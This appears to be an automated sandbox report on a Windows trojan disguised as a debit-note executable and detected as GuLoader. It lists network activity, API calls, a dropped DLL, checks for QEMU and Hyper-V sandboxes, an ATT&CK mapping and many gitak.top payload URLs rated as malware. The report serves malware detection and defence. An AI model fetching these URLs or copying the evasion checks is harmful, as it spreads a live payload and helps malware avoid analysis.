Source: unknown	Network traffic detected: HTTP traffic on port 49845 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49859
Source: unknown	Network traffic detected: HTTP traffic on port 49849 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49858
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49857
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49856
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49855
Source: unknown	Network traffic detected: HTTP traffic on port 49841 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49854
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49853
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49852
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49851
Source: unknown	Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49837 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49850
Source: unknown	Network traffic detected: HTTP traffic on port 49862 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49858 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49855 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49851 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49848 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49849
Source: unknown	Network traffic detected: HTTP traffic on port 49861 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49848
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49847
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49846
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49845
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49844
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49843
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49842
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49841
Source: unknown	Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49840
Source: unknown	Network traffic detected: HTTP traffic on port 49863 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49819 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49844 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49821 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49840 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49834 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49857 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49828 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49854 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49850 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49824 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49831 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49839
Source: unknown	Network traffic detected: HTTP traffic on port 49860 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49838
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49837
Source: unknown	Network traffic detected: HTTP traffic on port 49847 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49836
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49835
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49834
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49833
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49832
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49831
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown	Network traffic detected: HTTP traffic on port 49839 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49843 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49822 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49835 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49856 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49853 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49832 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49829
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49828
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49827
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49826
Source: unknown	Network traffic detected: HTTP traffic on port 49846 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49825
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49824
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49823
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49822

Source: unknown

HTTPS traffic detected: 172.67.207.219:443 -> 192.168.11.20:49817 version: TLS 1.2

Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe

Code function: 0_2_00405331 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_00405331

Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe

Code function: 0_2_0040335A EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,

0_2_0040335A

Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe	Code function: 0_2_00404B6E		0_2_00404B6E
Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe	Code function: 0_2_0040659D		0_2_0040659D

Source: debit-note-19-08-dn-2024.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal80.troj.evad.winEXE@3/10@1/1

Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe

Code function: 0_2_00404635 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_00404635

Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe

Code function: 0_2_0040206A CoCreateInstance,

0_2_0040206A

Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe

File created: C:\Users\user\brugerlicensaftalerne

Jump to behavior

Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe

File created: C:\Users\user\AppData\Local\Temp\nsc47EA.tmp

Jump to behavior

Source: debit-note-19-08-dn-2024.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: debit-note-19-08-dn-2024.exe

ReversingLabs: Detection: 50%

Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe

File read: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe "C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe"
Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe	Process created: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe "C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe"
Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe	Process created: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe "C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe"	Jump to behavior

Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe	Section loaded: ncryptsslp.dll	Jump to behavior

Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe

File written: C:\Users\user\AppData\Local\Temp\tmc.ini

Jump to behavior

Source: debit-note-19-08-dn-2024.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Yara detected GuLoader

Source: Yara match

File source: Process Memory Space: debit-note-19-08-dn-2024.exe PID: 5816, type: MEMORYSTR

Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe

Code function: 0_2_004062B2 GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_004062B2

Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe

Code function: 0_2_10002DE0 push eax; ret

0_2_10002E0E

Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe

File created: C:\Users\user\AppData\Local\Temp\nsb5059.tmp\System.dll

Jump to dropped file

Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe	API/Special instruction interceptor: Address: 86C1737
Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe	API/Special instruction interceptor: Address: 4EA1737

Tries to detect Any.run

Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: debit-note-19-08-dn-2024.exe, 00000000.00000002.11405587710.00000000032D0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: XC:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: debit-note-19-08-dn-2024.exe, 00000000.00000002.11404278301.000000000049E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE?\57
Source: debit-note-19-08-dn-2024.exe, 00000000.00000002.11404278301.000000000049E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE

Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsb5059.tmp\System.dll

Jump to dropped file

Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe TID: 6120	Thread sleep count: 41 > 30			Jump to behavior
Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe TID: 6120	Thread sleep time: -410000s >= -30000s			Jump to behavior

Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe	Code function: 0_2_004057D0 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_004057D0
Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe	Code function: 0_2_0040628B FindFirstFileW,FindClose,	0_2_0040628B
Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe	Code function: 0_2_00402770 FindFirstFileW,	0_2_00402770

Source: debit-note-19-08-dn-2024.exe, 00000000.00000002.11419596449.0000000010059000.00000004.00000800.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000002.15713289160.00000000075A9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Shutdown Service
Source: debit-note-19-08-dn-2024.exe, 00000000.00000002.11419596449.0000000010059000.00000004.00000800.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000002.15713289160.00000000075A9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: debit-note-19-08-dn-2024.exe, 00000002.00000003.11160436121.0000000005BFD000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11265722845.0000000005BF7000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11476497728.0000000005BFD000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11581843152.0000000005BFD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWkZ]
Source: debit-note-19-08-dn-2024.exe, 00000002.00000002.15713289160.00000000075A9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicshutdown
Source: debit-note-19-08-dn-2024.exe, 00000000.00000002.11419596449.0000000010059000.00000004.00000800.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000002.15713289160.00000000075A9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: debit-note-19-08-dn-2024.exe, 00000000.00000002.11419596449.0000000010059000.00000004.00000800.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000002.15713289160.00000000075A9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V PowerShell Direct Service
Source: debit-note-19-08-dn-2024.exe, 00000000.00000002.11419596449.0000000010059000.00000004.00000800.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000002.15713289160.00000000075A9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Time Synchronization Service
Source: debit-note-19-08-dn-2024.exe, 00000002.00000002.15713289160.00000000075A9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicvss
Source: debit-note-19-08-dn-2024.exe, 00000002.00000003.11160436121.0000000005BFD000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11265722845.0000000005BF7000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11476497728.0000000005BFD000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11581843152.0000000005BFD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: debit-note-19-08-dn-2024.exe, 00000000.00000002.11419596449.0000000010059000.00000004.00000800.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000002.15713289160.00000000075A9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Data Exchange Service
Source: debit-note-19-08-dn-2024.exe, 00000000.00000002.11405587710.00000000032D0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: xC:\Program Files\Qemu-ga\qemu-ga.exe
Source: debit-note-19-08-dn-2024.exe, 00000000.00000002.11419596449.0000000010059000.00000004.00000800.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000002.15713289160.00000000075A9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Heartbeat Service
Source: debit-note-19-08-dn-2024.exe, 00000002.00000002.15712696739.0000000005B88000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW8"
Source: debit-note-19-08-dn-2024.exe, 00000000.00000002.11419596449.0000000010059000.00000004.00000800.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000002.15713289160.00000000075A9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Service Interface
Source: debit-note-19-08-dn-2024.exe, 00000000.00000002.11404278301.000000000049E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exe
Source: debit-note-19-08-dn-2024.exe, 00000002.00000002.15713289160.00000000075A9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicheartbeat
Source: debit-note-19-08-dn-2024.exe, 00000000.00000002.11404278301.000000000049E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe?\57

Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe	API call chain: ExitProcess graph end node			graph_0-4744
Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe	API call chain: ExitProcess graph end node			graph_0-4745

Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe

Code function: 0_2_004062B2 GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_004062B2

Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe

Process created: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe "C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe"

Jump to behavior

Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe

Code function: 0_2_00405F6A GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,

0_2_00405F6A

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 DLL Side-Loading	11 Process Injection	1 Masquerading	OS Credential Dumping	31 Security Software Discovery	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	11 Virtualization/Sandbox Evasion	LSASS Memory	11 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Clipboard Data	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	11 Process Injection	Security Account Manager	3 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Obfuscated Files or Information	NTDS	13 System Information Discovery	Distributed Component Object Model	Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
debit-note-19-08-dn-2024.exe	50%	ReversingLabs	Win32.Trojan.Generic
debit-note-19-08-dn-2024.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\nsb5059.tmp\System.dll	0%	ReversingLabs

Source	Detection	Scanner	Label
https://gitak.top/KGukxUu155.bin~5	100%	Avira URL Cloud	malware
https://gitak.top/	100%	Avira URL Cloud	malware
http://nsis.sf.net/NSIS_ErrorError	0%	Avira URL Cloud	safe
https://gitak.top/m	100%	Avira URL Cloud	malware
https://gitak.top/KGukxUu155.bincy	100%	Avira URL Cloud	malware
https://gitak.top/KGukxUu155.bin	100%	Avira URL Cloud	malware
https://gitak.top/KGukxUu155.binificateChainPolicy	100%	Avira URL Cloud	malware
https://gitak.top/KGukxUu155.bin/u	100%	Avira URL Cloud	malware
https://www.cloudflare.com/learning/access-management/phishing-attack/	0%	Avira URL Cloud	safe
https://gitak.top/u	100%	Avira URL Cloud	malware
https://gitak.top/KGukxUu155.binR	100%	Avira URL Cloud	malware
http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD	0%	Avira URL Cloud	safe
https://gitak.top/KGukxUu155.bink	100%	Avira URL Cloud	malware
https://gitak.top/KGukxUu155.binl	100%	Avira URL Cloud	malware
https://gitak.top/KGukxUu155.bin/KGukxUu155.binID=	100%	Avira URL Cloud	malware
https://www.cloudflare.com/5xx-error-landing	0%	Avira URL Cloud	safe
https://gitak.top/KGukxUu155.bin/KGukxUu155.bin	100%	Avira URL Cloud	malware
https://gitak.top/KGukxUu155.binm	100%	Avira URL Cloud	malware
https://gitak.top/KGukxUu155.bin/a	100%	Avira URL Cloud	malware
https://gitak.top/a	100%	Avira URL Cloud	malware
https://gitak.top/KGukxUu155.binID=	100%	Avira URL Cloud	malware
https://gitak.top/KGukxUu155.bin)	100%	Avira URL Cloud	malware
https://gitak.top/KGukxUu155.bin#	100%	Avira URL Cloud	malware
https://gitak.top/KGukxUu155.bine	100%	Avira URL Cloud	malware
https://gitak.top/KGukxUu155.bin/m	100%	Avira URL Cloud	malware
https://gitak.top/KGukxUu155.bin_	100%	Avira URL Cloud	malware
https://gitak.top/KGukxUu155.bino(	100%	Avira URL Cloud	malware
https://gitak.top/KGukxUu155.bin:	100%	Avira URL Cloud	malware
http://www.quovadis.bm0	0%	Avira URL Cloud	safe
https://gitak.top/KGukxUu155.bina	100%	Avira URL Cloud	malware
https://gitak.top/KGukxUu155.binu	100%	Avira URL Cloud	malware
https://gitak.top/KGukxUu155.bin?o	100%	Avira URL Cloud	malware
https://gitak.top/KGukxUu155.bin0	100%	Avira URL Cloud	malware
https://ocsp.quovadisoffshore.com0	0%	Avira URL Cloud	safe
https://gitak.top/KGukxUu155.bin~53	100%	Avira URL Cloud	malware
https://gitak.top/KGukxUu155.binurT	100%	Avira URL Cloud	malware
